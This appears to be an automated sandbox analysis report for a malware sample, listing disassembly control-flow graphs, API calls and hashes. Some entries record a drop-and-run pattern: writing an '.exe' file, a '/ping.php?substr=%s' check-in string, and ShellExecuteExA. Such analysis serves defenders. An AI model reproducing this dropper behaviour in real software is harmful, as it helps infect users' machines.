                                                                                                                                                        control_flow_graph 1771 404189-4041c6 call 42780c call 407b1c call 401318 call 4013b5 1780 404201-404218 call 407b74 1771->1780 1781 4041c8-4041ca 1771->1781 1783 4041d0-4041e1 call 40436e 1781->1783 1784 4041cc-4041ce 1781->1784 1788 4041e3-4041fb call 407d41 1783->1788 1789 404219-404230 call 401198 call 40abcb 1783->1789 1784->1780 1788->1780
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                        • int.LIBCPMT ref: 004041B4
                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                        • Opcode ID: 361fc1b71d45246d246e84ef011ee978f208c0c02e1cbc670b2b90af33c601f8
                                                                                                                                                        • Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
                                                                                                                                                        • Opcode Fuzzy Hash: 361fc1b71d45246d246e84ef011ee978f208c0c02e1cbc670b2b90af33c601f8
                                                                                                                                                        • Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1797 426510-42651f 1798 426521-426527 1797->1798 1798->1798 1799 426529-42655c ShellExecuteExA 1798->1799 1800 426575-426581 call 402bef 1799->1800 1801 42655e-42656f WaitForSingleObject CloseHandle 1799->1801 1801->1800
                                                                                                                                                        APIs
                                                                                                                                                        • ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0042656F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                        • String ID: .exe
                                                                                                                                                        • API String ID: 3837156514-4119554291
                                                                                                                                                        • Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                        • Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
                                                                                                                                                        • Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                        • Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1804 426242-426267 CreateFileA 1805 426284-42628a 1804->1805 1806 426269-42627e WriteFile FindCloseChangeNotification 1804->1806 1806->1805
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                        • String ID: .exe
                                                                                                                                                        • API String ID: 3805958096-4119554291
                                                                                                                                                        • Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                        • Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
                                                                                                                                                        • Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                        • Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1807 4163fd-416411 call 41e84a 1810 416413-416415 1807->1810 1811 416417-41641f 1807->1811 1812 416465-416485 call 41e7b9 1810->1812 1813 416421-416428 1811->1813 1814 41642a-41642d 1811->1814 1824 416493 1812->1824 1825 416487-416491 call 41234b 1812->1825 1813->1814 1815 416435-416449 call 41e84a * 2 1813->1815 1816 41644b-41645b call 41e84a FindCloseChangeNotification 1814->1816 1817 41642f-416433 1814->1817 1815->1810 1815->1816 1816->1810 1828 41645d-416463 GetLastError 1816->1828 1817->1815 1817->1816 1826 416495-416498 1824->1826 1825->1826 1828->1812
                                                                                                                                                        APIs
                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
                                                                                                                                                        • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 490808831-0
                                                                                                                                                        • Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
                                                                                                                                                        • Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
                                                                                                                                                        • Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
                                                                                                                                                        • Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1832 419767-41977f call 41e84a 1835 419781-419786 call 412381 1832->1835 1836 419792-4197a8 SetFilePointerEx 1832->1836 1842 41978c-419790 1835->1842 1837 4197b9-4197c3 1836->1837 1838 4197aa-4197b7 GetLastError call 41234b 1836->1838 1841 4197c5-4197da 1837->1841 1837->1842 1838->1842 1845 4197df-4197e4 1841->1845 1842->1845
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                        • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                        • Opcode ID: 463c5a4e2e0130166045ce025073959b6dc275ceb70bdf3037ed559d4bcdb5d5
                                                                                                                                                        • Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
                                                                                                                                                        • Opcode Fuzzy Hash: 463c5a4e2e0130166045ce025073959b6dc275ceb70bdf3037ed559d4bcdb5d5
                                                                                                                                                        • Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1854 4264f9-42650f SysFreeString * 2 CoUninitialize
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeString$Uninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1985688103-0
                                                                                                                                                        • Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
                                                                                                                                                        • Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
                                                                                                                                                        • Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
                                                                                                                                                        • Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1855 419cc3-419ced 1856 419cf6-419d00 1855->1856 1857 419cef-419cf1 1855->1857 1859 419d02-419d11 call 413b67 1856->1859 1860 419d27-419d33 1856->1860 1858 419dc3-419dc8 1857->1858 1871 419f05-419f34 call 410932 CreateFileW 1859->1871 1872 419d17-419d1f 1859->1872 1862 419d35-419d3a 1860->1862 1863 419d7a 1860->1863 1866 419d68-419d73 1862->1866 1867 419d3c-419d41 1862->1867 1864 419d7c-419d82 1863->1864 1869 419dc0 1864->1869 1870 419d84-419d88 1864->1870 1866->1864 1868 419d75-419d78 1866->1868 1867->1866 1873 419d43-419d48 1867->1873 1868->1864 1874 419dc2 1869->1874 1870->1869 1875 419d8a-419d9d 1870->1875 1876 419d21 1872->1876 1877 419d64-419d66 1872->1877 1873->1868 1878 419d4a-419d4f 1873->1878 1874->1858 1881 419daa-419daf 1875->1881 1882 419d9f-419da4 1875->1882 1876->1860 1877->1860 1878->1868 1883 419d51-419d56 1878->1883 1881->1869 1889 419db1-419db4 1881->1889 1887 419da6-419da8 1882->1887 1888 419e08-419e20 call 4192ad 1882->1888 1884 419d58-419d5d 1883->1884 1885 419d5f-419d62 1883->1885 1884->1864 1884->1885 1885->1864 1887->1869 1887->1881 1899 419e22-419e29 1888->1899 1900 419e2b-419e2e 1888->1900 1891 419db6-419db9 1889->1891 1892 419dfd-419dff 1889->1892 1895 419dc9-419dda call 419800 1891->1895 1896 419dbb-419dbe 1891->1896 1893 419e00-419e02 1892->1893 1893->1888 1898 419ea3-419ea5 1893->1898 1904 419eab-419eb6 1895->1904 1907 419de0-419df3 call 419800 1895->1907 1896->1869 1896->1892 1898->1869 1898->1904 1899->1900 1901 419e60-419e67 call 412381 1900->1901 1902 419e30-419e36 1900->1902 1901->1874 1905 419e49-419e53 1902->1905 1906 419e38-419e3b 1902->1906 1908 419ec9-419ed2 1904->1908 1909 419eb8-419ebb 1904->1909 1913 419e55-419e5a call 412381 1905->1913 1914 419e6c-419e71 1905->1914 1911 419e3d-419e42 1906->1911 1912 419e8e-419ea1 call 419800 1906->1912 1907->1901 1927 419df5-419dfb 1907->1927 1916 419ed3-419ed5 1908->1916 1909->1916 1917 419ebd-419ec7 1909->1917 1911->1905 1920 419e44-419e47 1911->1920 1912->1898 1912->1901 1913->1901 1914->1912 1924 419e73-419e87 call 419800 1914->1924 1916->1869 1923 419edb-419ef4 call 415fa3 1916->1923 1917->1923 1920->1898 1923->1901 1932 419efa-419efe 1923->1932 1924->1901 1933 419e89-419e8c 1924->1933 1927->1893 1932->1923 1934 419f00 1932->1934 1933->1898 1934->1869
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 823142352-2766056989
                                                                                                                                                        • Opcode ID: 30582e01feb3ea99a973a783d27ef441fc8a1aac78a09caaa55a892fc09236fc
                                                                                                                                                        • Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
                                                                                                                                                        • Opcode Fuzzy Hash: 30582e01feb3ea99a973a783d27ef441fc8a1aac78a09caaa55a892fc09236fc
                                                                                                                                                        • Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                          • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                          • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                          • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                          • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                          • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                          • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                        • String ID: v*@
                                                                                                                                                        • API String ID: 3966877926-3062513736
                                                                                                                                                        • Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
                                                                                                                                                        • Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
                                                                                                                                                        • Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
                                                                                                                                                        • Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0042604F
                                                                                                                                                          • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                          • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 420165198-0
                                                                                                                                                        • Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                        • Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
                                                                                                                                                        • Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                        • Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000400,?,?,05CF0223,?,?), ref: 05CF0E19
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,05CF0223,?,?), ref: 05CF0E1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                        • Instruction ID: e05ddbe7559ed95876db12b689fb1193a863fb727343464faa4df4ae26ed8ca5
                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                        • Instruction Fuzzy Hash: 4BD01231545128B7D7402A94DC0DBCD7B1CDF05B62F008411FB0EE9081C770964047E5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fa999323bafbc2594b0c48ced461f1796886116cb5ad27cd811abb6661ac4478
                                                                                                                                                        • Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
                                                                                                                                                        • Opcode Fuzzy Hash: fa999323bafbc2594b0c48ced461f1796886116cb5ad27cd811abb6661ac4478
                                                                                                                                                        • Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                        • Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
                                                                                                                                                        • Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
                                                                                                                                                        • Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
                                                                                                                                                        • Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                          • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                          • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 938716162-0
                                                                                                                                                        • Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
                                                                                                                                                        • Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
                                                                                                                                                        • Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
                                                                                                                                                        • Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                          • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
                                                                                                                                                        • Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
                                                                                                                                                        • Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
                                                                                                                                                        • Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                          • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                        • Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
                                                                                                                                                        • Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
                                                                                                                                                        • Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
                                                                                                                                                        • Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                        • Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
                                                                                                                                                        • Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
                                                                                                                                                        • Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
                                                                                                                                                        • Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 13643555ea150916878c583df0512c733e0c47517646bb032251a44ff8f984d0
                                                                                                                                                        • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                        • Opcode Fuzzy Hash: 13643555ea150916878c583df0512c733e0c47517646bb032251a44ff8f984d0
                                                                                                                                                        • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                          • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                          • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                          • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                          • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                          • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                        • String ID:
